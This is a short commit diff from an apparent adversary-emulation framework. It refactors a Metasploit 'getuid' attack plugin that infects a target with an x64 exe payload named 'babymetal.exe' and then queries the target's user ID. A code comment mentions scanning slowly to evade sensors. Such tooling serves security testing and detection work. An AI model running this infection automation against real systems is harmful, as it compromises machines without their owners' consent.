Fixing metasploit getuid and switchign to new system

pull/12/head
Thorsten Sick 3 years ago
parent 6177532133
commit 2262e81048

@ -3,7 +3,6 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
class MetasploitGetuidPlugin(AttackPlugin):
@ -33,18 +32,13 @@ class MetasploitGetuidPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
uid = metasploit.getuid(target)
uid = self.metasploit.getuid(target)
print(f"UID: {uid}")
return res

Loading…
Cancel
Save